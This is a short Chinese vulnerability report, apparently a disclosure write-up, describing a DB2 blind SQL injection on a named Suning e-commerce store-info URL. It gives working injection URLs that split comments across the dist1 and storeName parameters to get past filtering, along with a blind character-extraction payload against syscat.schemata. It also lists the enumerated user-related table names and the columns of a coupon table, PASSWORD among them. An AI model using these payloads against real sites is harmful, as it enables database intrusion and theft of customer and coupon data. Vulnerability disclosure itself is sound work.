苏宁易购某DB2盲注
初始访问:
https://www.suning.com/emall/SNNetStoreInfoView?cityId1=9137&dist1=aa%27or%201=1/*&storeName=*/--
注入参数:
dist1 和storeName ,结合,绕过SQL防注。
如盲注猜解:
https://www.suning.com/emall/SNNetStoreInfoView?cityId1=9137&storeName=*/from%20syscat.schemata%20fetch%20first%201%20rows%20only%29,1,1%29%29%3E10--&dist1=aa%27or%20ascii%28SUBSTR%28%28select%20schemaname/*
不知道用户名在不在了,盲注,猜解比较慢。下面是简单猜解的一些表什么的。
漏洞证明:盲注猜解:
'ADVISE_INDEX','ADVISE_WORKLOAD','DMUSERBHVR','GRUSERAUTH','ORDUSERS','USERDEMO','USERLOCK','USERPROF','USERPVCDEV','USERPWDHST','USERREG','USERS','USER_QA','XACTJOINUSER','XGPUSERREL','XIPUSERS','XMEMBERCARDUSERS','XROULETTEUSERCOUNT','XROULETTEUSERS','XSECKILLUSERREL','XSENDUSERS','XSENDUSERS_BAK','XSMARTUSERCOUNT','XTMPUSERS','XUSERGRADE','XUSERGRADECONF','XUSERPREFER','ZST_USER','ZST_USER_ROLE','USEROPTIONS','SYSUSERAUTH','SYSUSEROPTIONS'
表:XCOUPON (优惠券)
'CHARGEDATE','CODE','COUPONGROUP_ID','COUPONTMP_ID','COUPON_ID','COUPON_NO','COUPON_TYPE','CREATED_BY','CREATED_DATE','DELIVERDATE','DESCRIPTION','ENDDATE','FIELD1','FIELD2','FIELD3','LAST_UPDATED','LEVEL','MARKFORDELETE','NAME','NOTES','OPTCOUNTER','ORDERS_ID','PAR_VALUE','PASSWORD','REMAININGAMOUNT','SERIALNUMBER','SOURCE_ID','SOURCE_TYPE','STARTDATE','STATUS','UPDATED_BY','USERS_ID'